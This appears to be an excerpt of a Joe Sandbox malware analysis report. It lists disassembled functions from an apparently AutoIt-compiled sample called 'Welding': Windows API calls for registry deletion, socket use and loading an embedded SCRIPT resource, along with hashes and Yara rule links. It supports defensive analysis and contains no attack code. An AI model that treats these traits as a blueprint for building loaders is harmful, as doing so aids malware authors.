Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 06ef4dfcb70d01e684c0ee00573f2b3f1059f4657e3d8e387f1a1039a17e3f9c
Instruction ID: b074561d652e336f62000b3bf8cecd6aaec9fe58a8d978e064bc5bad787eec47
Opcode Fuzzy Hash: 06ef4dfcb70d01e684c0ee00573f2b3f1059f4657e3d8e387f1a1039a17e3f9c
Instruction Fuzzy Hash: AB416D7150C344AAC75AEF64C481ADBB7ECAF99340F40093EF499D3292EB34D689C766

Function 001378B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001378CF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00137976
IsMenu.USER32(?), ref: 0013798E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001379D6
DrawMenuBar.USER32 ref: 001379E9

Strings

0, xrefs: 001378C3

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 2777babd94b91f647a5d10a65d1e43ceac896c9c30d4afda1bb1e19a14a6b5a8
Instruction ID: 9c0e9b01cc4f5fb202d1d8eb104ca6566ae661c7f360f9c92c15f2e5a912c886
Opcode Fuzzy Hash: 2777babd94b91f647a5d10a65d1e43ceac896c9c30d4afda1bb1e19a14a6b5a8
Instruction Fuzzy Hash: FD415FB5A04209EFDB20DF54D884F9ABBF5FF09325F048269E95597290C730AD94CF90

Function 00131602 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00131631
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0013165B
FreeLibrary.KERNEL32(00000000), ref: 00131712

Part of subcall function 00131602: RegCloseKey.ADVAPI32(?), ref: 00131678
Part of subcall function 00131602: FreeLibrary.KERNEL32(?), ref: 001316CA
Part of subcall function 00131602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 001316ED

RegDeleteKeyW.ADVAPI32(?,?), ref: 001316B5

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 448aa7e50cc9840cc9f220d6f40b6564feb4a1bbe5b75cb4db7d2cc5edc9e28a
Instruction ID: ece6e2e3dd89c91429a0292b4749101945a4d40d11d0cc16ddbadf730c763575
Opcode Fuzzy Hash: 448aa7e50cc9840cc9f220d6f40b6564feb4a1bbe5b75cb4db7d2cc5edc9e28a
Instruction Fuzzy Hash: 8D313CB5901109BFDB15DF91DC89EFEB7BCEF09340F040169F901A2150EB749E859BA0

Function 001368F2 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00136911
GetWindowLongW.USER32(?,000000F0), ref: 00136944
GetWindowLongW.USER32(?,000000F0), ref: 00136979
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 001369AB
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 001369D5
GetWindowLongW.USER32(?,000000F0), ref: 001369E6
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00136A00

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: f231c8191684297f7c120f6ca05109845b187c63623075a36114de732bb5414f
Instruction ID: 478f7b551ae3c847ba24318fe2075d1acb4311d713117d66cb968c5bf95fb752
Opcode Fuzzy Hash: f231c8191684297f7c120f6ca05109845b187c63623075a36114de732bb5414f
Instruction Fuzzy Hash: DF313235608154EFDB21CF19DC88F6437E1EB4A358F1981A4FA098F6B2CB72AC90CB51

Function 0010E287 Relevance: 10.6, APIs: 7, Instructions: 95COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0010E2CA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0010E2F0
#2.WSOCK32(00000000), ref: 0010E2F3
#2.WSOCK32(?), ref: 0010E311
#6.OLEAUT32(?), ref: 0010E31A
StringFromGUID2.OLE32(?,?,00000028), ref: 0010E33F
#2.WSOCK32(?), ref: 0010E34D

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: ByteCharMultiWide$FromString
String ID:
API String ID: 1211328463-0
Opcode ID: f1d0c8ca2ebad3cc53471d7aa32c6f3849e3af45bfd606cd7520826d05a774f2
Instruction ID: 464c82283bf03500f93a3bb63dda35d00bd49f70b358e1a79707b8ec960a65b5
Opcode Fuzzy Hash: f1d0c8ca2ebad3cc53471d7aa32c6f3849e3af45bfd606cd7520826d05a774f2
Instruction Fuzzy Hash: 74218676604219AFDB10DFA9DC88CBB77ECFB09360B044525FE54DB2A0D770AD818760

Function 0012685E Relevance: 10.6, APIs: 7, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00128475: #10.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001284A0

#23.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 001268B1
#111.WSOCK32(00000000), ref: 001268C0
#12.WSOCK32(00000000,8004667E,00000000), ref: 001268F9
#4.WSOCK32(00000000,?,00000010), ref: 00126902
#111.WSOCK32 ref: 0012690C
#3.WSOCK32(00000000), ref: 00126935
#12.WSOCK32(00000000,8004667E,00000000), ref: 0012694E

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: #111
String ID:
API String ID: 568940515-0
Opcode ID: 721fa4037db32660b3bbac482f529951e4871e8850fe4a7b60f79f00abc4d73f
Instruction ID: 337ee41a9adae277fe0cbc003d510d92d024094b9b9c86782142ef19ba7e04d1
Opcode Fuzzy Hash: 721fa4037db32660b3bbac482f529951e4871e8850fe4a7b60f79f00abc4d73f
Instruction Fuzzy Hash: E531E771600214AFDF10AF24DC85BBD77A9EB45725F044019FD05A72D2CB70AD54CBA1

Function 0010E360 Relevance: 10.6, APIs: 7, Instructions: 90COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0010E3A5
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0010E3CB
#2.WSOCK32(00000000), ref: 0010E3CE
#2.WSOCK32 ref: 0010E3EF
#6.OLEAUT32 ref: 0010E3F8
StringFromGUID2.OLE32(?,?,00000028), ref: 0010E412
#2.WSOCK32(?), ref: 0010E420

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: ByteCharMultiWide$FromString
String ID:
API String ID: 1211328463-0
Opcode ID: 8c1c082e8ba264eff5be969df97555c305a76d66d907e7a72a11b1b8eaebb315
Instruction ID: eec096a9ea5460f93e640c5b597e199be60f809dbd9d3cdbe39c73748c9c52b4
Opcode Fuzzy Hash: 8c1c082e8ba264eff5be969df97555c305a76d66d907e7a72a11b1b8eaebb315
Instruction Fuzzy Hash: 9B218B35604204AFDB149FA9DC88DAE77ECEB0D3607448529FA45CB2A1D770DC818764

Function 0010FE19 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0010FE2C
__wcsnicmp.LIBCMT ref: 0010FE4D
__wcsnicmp.LIBCMT ref: 0010FE67

Strings

#notrayicon, xrefs: 0010FE24
#requireadmin, xrefs: 0010FE47
#OnAutoItStartRegister, xrefs: 0010FE61

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: b8ee48f9e4b66e8d39c09566176584bba2d91c39dd1384fd97eedf6dadd320c4
Instruction ID: 2e47bc58b98b46d1982456ce786e799e2187f5a114e34340162b1deba97b256b
Opcode Fuzzy Hash: b8ee48f9e4b66e8d39c09566176584bba2d91c39dd1384fd97eedf6dadd320c4
Instruction Fuzzy Hash: FD21F53210025166D334AB24DC17FEB7399EF51700F52443EF5C6869E3EBE59E4382A5

Function 00137BF2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000B2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000B214F
Part of subcall function 000B2111: GetStockObject.GDI32(00000011), ref: 000B2163
Part of subcall function 000B2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 000B216D

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00137C57
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00137C64
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00137C6F
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00137C7E
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00137C8A

Strings

Msctls_Progress32, xrefs: 00137C28

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: c9ac71b49649b147b1dd135beba8fa395b8def73c458402e3e1e931cd5c31a35
Instruction ID: 908b351f5d768a5d36a9ab224917dcd9f65d9de3c4a9320a37e00afc5462f983
Opcode Fuzzy Hash: c9ac71b49649b147b1dd135beba8fa395b8def73c458402e3e1e931cd5c31a35
Instruction Fuzzy Hash: 1611B6B2140219BEEF158F60CC85EE77F5DEF09798F015114BB08A20A0C7719C61DBA0

Function 00119ED8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00100817,?,?,00000000,00000000), ref: 00119EE8
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00100817,?,?,00000000,00000000), ref: 00119EFF
LoadResource.KERNEL32(?,00000000,?,?,00100817,?,?,00000000,00000000,?,?,?,?,?,?,000C4A14), ref: 00119F0F
SizeofResource.KERNEL32(?,00000000,?,?,00100817,?,?,00000000,00000000,?,?,?,?,?,?,000C4A14), ref: 00119F20
LockResource.KERNEL32(00100817,?,?,00100817,?,?,00000000,00000000,?,?,?,?,?,?,000C4A14,00000000), ref: 00119F2F

Strings

SCRIPT, xrefs: 00119EF5

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 5aa9fcc09557de83f14150159836bee7b0de6c640312e85197e78e2d71d3c3e1
Instruction ID: f78377de7bc23df29debc1d4dcc6e4fe42499ca9831671709a10e851400187dd
Opcode Fuzzy Hash: 5aa9fcc09557de83f14150159836bee7b0de6c640312e85197e78e2d71d3c3e1
Instruction Fuzzy Hash: 5E118E74200701BFE7258B66DC48F677BBDEBCAB11F10426CBA19D66A0DB71EC85C660

Function 000D9D16 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 000D9D16

Part of subcall function 000D33B7: EncodePointer.KERNEL32(00000000), ref: 000D33BA
Part of subcall function 000D33B7: __initp_misc_winsig.LIBCMT ref: 000D33D5
Part of subcall function 000D33B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 000DA0D0
Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 000DA0E4
Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 000DA0F7
Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 000DA10A
Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 000DA11D
Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 000DA130
Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 000DA143
Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 000DA156
Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 000DA169
Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 000DA17C
Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 000DA18F
Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 000DA1A2
Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 000DA1B5
Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 000DA1C8
Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 000DA1DB
Part of subcall function 000D33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 000DA1EE

__mtinitlocks.LIBCMT ref: 000D9D1B
__mtterm.LIBCMT ref: 000D9D24

Part of subcall function 000D9D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,000D9D29,000D7EFD,0016CD38,00000014), ref: 000D9E86
Part of subcall function 000D9D8C: _free.LIBCMT ref: 000D9E8D
Part of subcall function 000D9D8C: DeleteCriticalSection.KERNEL32(00170C00,?,?,000D9D29,000D7EFD,0016CD38,00000014), ref: 000D9EAF

__calloc_crt.LIBCMT ref: 000D9D49
__initptd.LIBCMT ref: 000D9D6B
GetCurrentThreadId.KERNEL32 ref: 000D9D72

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: b27b7e1ff2e1777eac08d8f3d9fb5395fd52c363ab43bed769a738d4cf96f9a5
Instruction ID: 72c3a32c41246610008dd5ac29b087cb333b1e9377d2129786e335060c866ac8
Opcode Fuzzy Hash: b27b7e1ff2e1777eac08d8f3d9fb5395fd52c363ab43bed769a738d4cf96f9a5
Instruction Fuzzy Hash: F8F090326197115AE7757B78BC036CA36D6DF42734F20462BF558D53D3EF10898181B1

Function 000C50DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000C5109
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000C512A
ShowWindow.USER32(00000000), ref: 000C513E
ShowWindow.USER32(00000000), ref: 000C5147

Strings

AutoIt v3, xrefs: 000C5101, 000C5106, 000C5107
edit, xrefs: 000C5124

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 848d0f87d9b7b54b0cbafddd2bf5eb98ba719f9694852fdc6358df3805e81d7c
Instruction ID: 5d48e456841b2e45773731bbb6615c5a74b6977080c62458dca4a7b10d055bbc
Opcode Fuzzy Hash: 848d0f87d9b7b54b0cbafddd2bf5eb98ba719f9694852fdc6358df3805e81d7c
Instruction Fuzzy Hash: C4F017705442907AEA222723AC08E273E7DE7CAF10F01002EBA18A26B2C67118C0CAB0

Function 000D41B9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,000D4282,?), ref: 000D41D3
GetProcAddress.KERNEL32(00000000), ref: 000D41DA
EncodePointer.KERNEL32(00000000), ref: 000D41E6
DecodePointer.KERNEL32(00000001,000D4282,?), ref: 000D4203

Strings

combase.dll, xrefs: 000D41CE
RoInitialize, xrefs: 000D41C2

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: 6c7ff513401fc3bb7d50124d47f899e33b249fecab7f530773b5f6af2535fd20
Instruction ID: 261dba7b024c0fdc5b3e94beacceaa28f5641ad83ad9fd6e525d62664e7b8bad
Opcode Fuzzy Hash: 6c7ff513401fc3bb7d50124d47f899e33b249fecab7f530773b5f6af2535fd20
Instruction Fuzzy Hash: 61E01A78A90701AFEB516FB1EC4DB083AA6BB1AB07FA04424BA15D59F0CBF540C5CF10

Function 000D428E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,000D41A8), ref: 000D42A8
GetProcAddress.KERNEL32(00000000), ref: 000D42AF
EncodePointer.KERNEL32(00000000), ref: 000D42BA
DecodePointer.KERNEL32(000D41A8), ref: 000D42D5

Strings

combase.dll, xrefs: 000D42A3
RoUninitialize, xrefs: 000D4297

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150608092.0000000000179000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b0000_Welding.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: babd2fffa6ddec7a6e6d4e805cec874f65c011d426b298448080341c6c9247e6
Instruction ID: 0b68b0fa8903023012db8855162bf9af63dd9969355b8662805656461e91d18a
Opcode Fuzzy Hash: babd2fffa6ddec7a6e6d4e805cec874f65c011d426b298448080341c6c9247e6
Instruction Fuzzy Hash: 33E0B674950B00AFEB529F61AD4DB543AB5B709B03FD00525F205D59F0CBF445C4DA10

Function 000B218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 000B21B8
GetWindowRect.USER32(?,?), ref: 000B21F9
ScreenToClient.USER32(?,?), ref: 000B2221
GetClientRect.USER32(?,?), ref: 000B2350
GetWindowRect.USER32(?,?), ref: 000B2369

Memory Dump Source

Source File: 0000000F.00000002.4150382750.00000000000B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 000B0000, based on PE: true

Associated: 0000000F.00000002.4150358383.00000000000B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150484391.0000000000166000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000170000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.4150552719.0000000000174000.00000008.00000001.01000000.00000007.sdmpDownload File
